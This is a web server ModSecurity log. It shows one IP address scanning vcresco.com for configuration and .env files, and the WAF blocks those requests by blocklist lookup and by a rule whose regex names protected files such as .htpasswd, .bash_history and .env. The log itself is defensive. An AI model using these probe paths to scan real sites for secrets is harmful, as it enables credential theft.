[Tue May 26 13:04:02.076682 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_0wAAAFI"]
[Tue May 26 13:04:02.081940 2026] [security2:error] [pid 470766:tid 471009] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_1AAAAHE"]
[Tue May 26 13:04:02.089789 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_2AAAaio"]
[Tue May 26 13:04:02.089796 2026] [security2:error] [pid 470766:tid 470832] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/config.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_4QAAakE"]
[Tue May 26 13:04:02.090545 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_2gAAahY"]
[Tue May 26 13:04:02.196429 2026] [security2:error] [pid 470766:tid 470833] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/env.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_6QAAakI"]
[Tue May 26 13:04:02.212564 2026] [security2:error] [pid 470766:tid 470885] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/module.config.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_7QAAanY"]
[Tue May 26 13:04:02.221108 2026] [security2:error] [pid 470766:tid 470826] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/nexmo.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_7wAAajs"]
[Tue May 26 13:04:02.235165 2026] [security2:error] [pid 470766:tid 470845] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/stripe.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_9wAAak4"]
[Tue May 26 13:04:02.292269 2026] [security2:error] [pid 470766:tid 470901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_3AAAAAU"]
[Tue May 26 13:04:02.310605 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_3wAAai0"]
[Tue May 26 13:04:02.312302 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_6AAAajQ"]
[Tue May 26 13:04:02.316605 2026] [security2:error] [pid 470766:tid 471019] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_7gAAAHs"]
[Tue May 26 13:04:02.321673 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_6gAAajE"]
[Tue May 26 13:04:02.322175 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_5QAAalA"]
[Tue May 26 13:04:02.326756 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_5gAAajY"]
[Tue May 26 13:04:02.329366 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_5wAAakM"]
[Tue May 26 13:04:02.333976 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_9QAAaiM"]
[Tue May 26 13:04:02.341301 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_9gAAajw"]
[Tue May 26 13:04:02.350443 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_9AAAACw"]
[Tue May 26 13:04:02.356396 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_-AAAABc"]
[Tue May 26 13:04:02.388801 2026] [security2:error] [pid 470766:tid 471003] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ABgAAAGs"]
[Tue May 26 13:04:02.397867 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ABwAAal8"]
[Tue May 26 13:04:02.406372 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ACAAAakg"]
[Tue May 26 13:04:02.426164 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ADAAAAE8"]
[Tue May 26 13:04:02.488512 2026] [security2:error] [pid 470766:tid 470948] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ADwAAADQ"]
[Tue May 26 13:04:02.497692 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AGAAANnE"]
[Tue May 26 13:04:02.499780 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AFgAANic"]
[Tue May 26 13:04:02.500620 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AEQAANkc"]
[Tue May 26 13:04:02.512770 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AFwAAADI"]
[Tue May 26 13:04:02.518848 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AHwAAAAA"]
[Tue May 26 13:04:02.519191 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AIAAANjA"]
[Tue May 26 13:04:02.524385 2026] [security2:error] [pid 470766:tid 470949] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AIQAAADU"]
[Tue May 26 13:04:02.530155 2026] [security2:error] [pid 470766:tid 471022] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AIgAAAH4"]
[Tue May 26 13:04:02.545511 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AKgAAAA4"]
[Tue May 26 13:04:02.546976 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AKwAAAG0"]
[Tue May 26 13:04:02.571294 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ALgAANnc"]
[Tue May 26 13:04:02.572145 2026] [security2:error] [pid 470766:tid 470883] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/crm/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4ANAAANnQ"]
[Tue May 26 13:04:02.579555 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ALwAAAEc"]
[Tue May 26 13:04:02.586663 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AMQAANiw"]
[Tue May 26 13:04:02.635604 2026] [security2:error] [pid 470766:tid 470840] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/cron/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4AOQAAUUk"]
[Tue May 26 13:04:02.642617 2026] [security2:error] [pid 470766:tid 470822] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/current/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4AOwAASDc"]
[Tue May 26 13:04:02.647442 2026] [security2:error] [pid 470766:tid 470855] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/demo/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4APQAAOlg"]
[Tue May 26 13:04:02.664295 2026] [security2:error] [pid 470766:tid 470881] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/dev/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4AQgAAOnI"]
[Tue May 26 13:04:02.670091 2026] [security2:error] [pid 470766:tid 470843] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/develop/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4ARgAAOkw"]
[Tue May 26 13:04:02.676667 2026] [security2:error] [pid 470766:tid 470856] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/developer/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4ASAAAOlk"]
[Tue May 26 13:04:02.694156 2026] [security2:error] [pid 470766:tid 470987] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AQAAAAFs"]
[Tue May 26 13:04:02.698483 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ARAAAOnM"]
[Tue May 26 13:04:02.699987 2026] [security2:error] [pid 470766:tid 470991] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ARQAAAF8"]
[Tue May 26 13:04:02.701407 2026] [security2:error] [pid 470766:tid 470774] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/development/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4ASwAAOgc"]
[Tue May 26 13:04:02.740558 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4ATgAAAC0"]
[Tue May 26 13:04:02.747887 2026] [security2:error] [pid 470766:tid 470927] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AUQAAAB8"]
[Tue May 26 13:04:02.752912 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AUwAAOl0"]
[Tue May 26 13:04:02.766178 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AVQAAAGY"]
[Tue May 26 13:04:02.779162 2026] [security2:error] [pid 470766:tid 470914] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AWwAAABI"]
[Tue May 26 13:04:02.782026 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AWQAAAEs"]
[Tue May 26 13:04:02.783672 2026] [security2:error] [pid 470766:tid 470898] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ7_-wAAAAI"]
[Tue May 26 13:04:02.821235 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AXwAAAAo"]
[Tue May 26 13:04:02.828936 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AYwAAABY"]
[Tue May 26 13:04:02.843384 2026] [security2:error] [pid 470766:tid 470956] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AZAAAADw"]
[Tue May 26 13:04:02.854313 2026] [security2:error] [pid 470766:tid 471012] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AcQAAAHQ"]
[Tue May 26 13:04:02.858389 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AbwAAOls"]
[Tue May 26 13:04:02.862303 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AbQAAACs"]
[Tue May 26 13:04:02.875857 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AcgAAOmg"]
[Tue May 26 13:04:02.886338 2026] [security2:error] [pid 470766:tid 470946] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AeQAAADI"]
